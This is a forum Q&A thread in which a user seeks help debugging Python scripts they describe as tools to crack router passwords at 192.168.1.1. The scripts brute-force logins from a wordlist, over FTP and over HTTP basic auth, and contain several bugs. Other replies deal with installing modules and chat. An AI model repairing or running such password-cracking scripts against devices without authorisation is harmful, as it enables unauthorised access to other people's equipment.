+ 3
Another error...... Need help again :( code in comment section, error in description
Traceback (most recent call last): File "/data/user/0/ru.iiec.pydroid2/files/accomp_files/iiec_hackrun/iiec_hackrun.py", line 29, in <module> start(fakepyfile,mainpyfile) File "/data/user/0/ru.iiec.pydroid2/files/accomp_files/iiec_hackrun/iiec_hackrun.py", line 19, in start execfile(mainpyfile, __main__.__dict__) File "/data/user/0/ru.iiec.pydroid2/files/temp_iiec_codefile.py", line 3, in <module>
26 Answers
+ 3
Thanks...... I will just attempt to rewrite it with the requests module 😔
+ 3
Im good what bout you?
+ 3
Damn, you know C++? wow, just wow. I can't learn it it is just too hard for me lol
+ 3
i need to install it again tho........... damn................:'(
+ 3
Meh i'll do if tomorrow
+ 3
Thanks for helping me though :)
+ 2
from ftplib import FTP
ftp = FTP()
ftp.connect("192.168.1.1", "80")
username = raw_input("Enter username: ")
passwrd = raw_input("Password list: ")
passwrd = open(passwrd, "r").readlines()
for password in passwrd:
try:
ftp.login(user=username, passwd=password)
print "Password CRACKED
: %s" % password
except ftpAuthenticationError:
print "INVALID Password: %s" % password
+ 2
I wrote this to crack 192.168.1.1 router passwords with ftp protocol. I
+ 2
i know but i entered 21 as port but nope it said connection refused...
+ 2
ummmm just 1 more thing
+ 2
import requests
username = raw_input("Username: ")
pwlist = raw_input("Wordlist: ")
for password in pwlist:
try:
req = requests.get('http://192.168.1.1', auth = (username, pwlist))
except requests.exceptions.ContentDecodingError:
print "Wrong password: %s" % password
says no module named requests........... Why 😩😖
+ 2
i did that
+ 2
requests.py? i have no clue i just went on termux and typed in pip installation requests and then easy_install requests restarted my IDE and still nope
+ 2
pip install*
+ 2
i accidentally pressed the predicted word lol
+ 2
okay
+ 2
no command found 'pipenv'.....
+ 2
:(
+ 2
What If I try it on kali? I think it will work..
+ 2
lol yea probably...